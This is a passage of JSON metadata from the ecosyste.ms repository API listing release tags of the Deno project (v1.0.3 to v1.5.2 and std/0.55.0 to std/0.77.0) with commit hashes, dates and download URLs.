v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%